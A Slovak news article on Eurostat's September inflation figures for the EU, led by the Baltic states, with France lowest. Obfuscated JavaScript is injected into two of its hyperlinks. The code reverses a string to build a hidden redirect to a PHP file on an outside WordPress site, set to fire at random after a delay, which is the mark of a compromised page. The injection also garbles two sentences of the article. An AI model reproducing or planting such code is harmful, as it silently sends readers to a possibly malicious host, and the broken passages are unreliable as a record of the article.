Tempo rastu cien v Európskej únii ani eurozóne nespomaľuje. Miera inflácie v dvadsaťsedmičke v septembri v medziročnom vyjadrení vystúpila na 10,9 percenta.

Inflácia v Európskej únii atakuje 11 percent. Ceny najrýchlejšie rastú v Pobaltí, najpomalšie vo Francúzsku

Tempo rastu cien v Európskej únii ani eurozóne nespomaľuje. Miera inflácie v dvadsaťsedmičke v septembri v medziročnom vyjadrení vystúpila na 10,9 percenta, čo je o 0,8 percentuálneho bodu viac ako v auguste. Vyplýva to z aktuálnych údajov Eurostatu.

Pobaltské štáty vedú

Suverénne najvyššej inflácii čelia pobaltské štáty. Smutným lídrom inflačného rebríčka zostáva Estónsko, kde medziročná miera inflácie dosiahla v septembri 24,1 percenta. Nasleduje Litva (22,5) a Lotyšsko (22). Viac ako dvadsaťpercentnú infláciu vykázalo ešte Maďarsko, a to 20,7 percenta.

Vo Francúzsku vzrástla inflácia najmenej

Naopak najpomalšie ceny v septembri vzrástli vo Francúzsku, kde sa medziročne zvýšili len o 6,2 percenta. Druhú najnižšiu infláciu v európskej dvadsaťsedmičke zaznamenala Malta (7,4), tretiu Fínsko (8,4). Na priemere Európskej únie sa ocitla inflácia v $mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dodavkach-lng-do-europy/“ target=“_blank“ rel=“noopener“ title=““>Nemecku a Rakúsku. O viac ako 11 percent už ceny stúpli v Dánsku. Zo starých členských krajín EÚ ceny rastú najrýchlejšie v Holandsku, a to o 17,1 percenta.

V medzimesačnom vyjadrení ceny v septembri rástli vo všetkých krajinách $mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom-ruskych-vojsk-na-ukrajinu/“ target=“_blank“ rel=“noopener“ title=““>EÚ s výnimkou Španielska, Francúzska, Cypru, Malty, Slovenska, kde došlo k medzimesačnej deflácii, a Írska, kde ceny v septembri v porovnaní s augustom stagnovali.

6 komentárov

Přidat komentář

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *